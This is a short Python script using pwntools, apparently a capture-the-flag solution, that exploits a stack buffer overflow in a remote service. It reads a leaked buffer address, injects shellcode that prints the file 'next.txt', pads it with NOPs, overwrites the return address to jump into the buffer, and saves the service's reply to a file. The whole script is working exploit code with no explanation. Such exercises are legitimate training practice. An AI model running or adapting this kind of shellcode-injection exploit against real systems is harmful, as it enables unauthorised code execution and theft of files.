from pwn import *
context(arch='amd64', os='linux')

e = ELF("./next")

io = remote("u.incus", 8080)
# io = remote("localhost", 8181)
io.sendline(b"A" * 0x60)
io.recvuntil(b"DEBUG: buf is at ")
buf_addr = int(io.recvline().decode().strip(), 16)
print(hex(buf_addr))

sc = f'''
mov rsp, {buf_addr - 1024}
'''
sc += shellcraft.cat2('next.txt', 5, 30000)
print(sc)
sc = asm(sc)

p1 = sc + b'\x90' * (280 - len(sc)) + p64(buf_addr)
io.sendline(p1)

res = io.recvall(timeout=50)
with open('outfile', 'wb') as fd:
    fd.write(res)

# io.interactive()